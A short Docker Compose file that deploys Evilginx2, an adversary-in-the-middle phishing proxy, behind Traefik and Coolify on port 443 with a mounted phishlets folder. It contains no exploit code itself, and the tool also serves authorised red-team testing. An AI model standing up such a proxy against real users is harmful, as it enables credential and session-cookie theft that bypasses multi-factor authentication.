services:
  evilginx:
    image: warhorse/evilginx2:latest
    container_name: evilginx2
    expose:
      - "443"                    # internal port
    labels:
      - coolify.port=443
      - traefik.http.services.evilginx.loadbalancer.server.scheme=https
    volumes:
      - ./phishlets:/phishlets
      - config_data:/config
    restart: unless-stopped
volumes:
  config_data:
